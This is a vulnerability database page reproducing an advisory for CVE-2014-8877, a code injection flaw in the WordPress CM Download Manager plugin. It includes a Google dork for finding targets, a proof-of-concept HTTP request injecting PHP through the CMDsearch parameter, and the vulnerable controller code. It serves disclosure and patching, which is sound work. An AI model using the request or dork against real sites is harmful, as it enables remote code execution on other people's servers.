Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtRrdw1337DAY-ID-22907
HistoryNov 20, 2014 - 12:00 a.m.

WordPress CM Download Manager 2.0.0 Code Injection Vulnerability

2014-11-2000:00:00
rrdw
0day.today
23

0.461 Medium

EPSS

Percentile

97.1%

JSON

WordPress CM Download Manager plugin versions 2.0.0 and below suffer from a code injection vulnerability.

Vulnerability title: Code Injection in Wordpress CM Download Manager plugin
CVE: CVE-2014-8877 
Plugin: CM Download Manager plugin
Vendor: CreativeMinds - https://www.cminds.com/
Product: https://wordpress.org/plugins/cm-download-manager/
Affected version: 2.0.0 and previous version
Fixed version: 2.0.4
Google dork: inurl:cmdownloads
Reported by: Phi Le Ngoc - [emailΒ protected]
Credits to ITAS Team - www.itas.vn


::DESCRITION::
 
The code injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker gains full control of the application and the ability to use any operating system functions that are available to the scripting environment. 

GET /cmdownloads/?CMDsearch=".phpinfo()." HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.1698795018.1415614778; _gat=1; PHPSESSID=okt6c51s4esif2qjq451ati7m6; cmdm_disclaimer=Y; JSB=1415614988879 
Connection: keep-alive

Vulnerable file:/wp-content/plugins/cm-download-manager/lib/controllers/CmdownloadController.php
Vulnerable code: (Line: 130 -> 158)


public static function alterSearchQuery($search, $query)
    {
        if( ( (isset($query->query_vars['post_type']) && $query->query_vars['post_type'] == CMDM_GroupDownloadPage::POST_TYPE) && (!isset($query->query_vars['widget']) || $query->query_vars['widget'] !== true) ) && !$query->is_single && !$query->is_404 && !$query->is_author && isset($_GET['CMDsearch']) )
        {
            global $wpdb;
            $search_term = $_GET['CMDsearch'];
            if( !empty($search_term) )
            {
                $search = '';
                $query->is_search = true;
                // added slashes screw with quote grouping when done early, so done later
                $search_term = stripslashes($search_term);
                preg_match_all('/".*?("|$)|((?<=[\r\n\t ",+])|^)[^\r\n\t ",+]+/', $search_term, $matches);
                $terms = array_map('_search_terms_tidy', $matches[0]);

                $n = '%';
                $searchand = ' AND ';
                foreach((array) $terms as $term)
                {
                    $term = esc_sql(like_escape($term));
                    $search .= "{$searchand}(($wpdb->posts.post_title LIKE '{$n}{$term}{$n}') OR ($wpdb->posts.post_content LIKE '{$n}{$term}{$n}'))";
                }
                add_filter('get_search_query', create_function('$q', 'return "' . $search_term . '";'), 99, 1);
                remove_filter('posts_request', 'relevanssi_prevent_default_request');
                remove_filter('the_posts', 'relevanssi_query');
            }
        }
        return $search;
}

::SOLUTION::
Update to version 2.0.4

::DISCLOSURE::
2014-11-08 initial vendor contact
2014-11-10 vendor response
2014-11-10 vendor confirmed 
2014-11-11 vendor release patch
2014-11-14 public disclosure

#  0day.today [2018-01-03]  #

Related

wpexploit 1
patchstack 1
securityvulns 2
exploitpack 1
openvas 1
cvelist 1
wpvulndb 1
checkpoint_advisories 1
cve 1
prion 1
packetstorm 1
exploitdb 1
nmap 1
wpexploit
wpexploit
CM Download Manager <= 2.0.0 - Unauthenticated Code Injection
2014-11-20 00:00:00
patchstack
patchstack
WordPress CM Download Manager Plugin 2.0.0 - Code Injection
2014-11-22 00:00:00
securityvulns
securityvulns
CVE-2014-8877 - Code Injection in Wordpress CM Download Manager plugin
2014-12-01 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2014-12-01 00:00:00
exploitpack
exploitpack
WordPress Plugin CM Download Manager 2.0.0 - Code Injection
2014-11-22 00:00:00
openvas
openvas
WordPress CM Download Manager Plugin Remote PHP Code Execution Vulnerability
2014-11-21 00:00:00
cvelist
cvelist
CVE-2014-8877
2014-12-05 18:00:00
wpvulndb
wpvulndb
CM Download Manager <= 2.0.0 - Unauthenticated Code Injection
2014-11-20 00:00:00
checkpoint_advisories
checkpoint_advisories
WordPress CM Download Manager Code Injection (CVE-2014-8877)
2017-01-30 00:00:00
cve
cve
CVE-2014-8877
2014-12-05 18:59:00
prion
prion
Code injection
2014-12-05 18:59:00
packetstorm
packetstorm
WordPress CM Download Manager 2.0.0 Code Injection
2014-11-20 00:00:00
exploitdb
exploitdb
WordPress Plugin CM Download Manager 2.0.0 - Code Injection
2014-11-22 00:00:00
nmap
nmap
http-vuln-cve2014-8877 NSE Script
2015-11-11 17:02:28

0.461 Medium

EPSS

Percentile

97.1%

JSON
Related for 1337DAY-ID-22907
wpexploit1patchstack1securityvulns2exploitpack1openvas1cvelist1wpvulndb1checkpoint_advisories1cve1prion1packetstorm1exploitdb1nmap1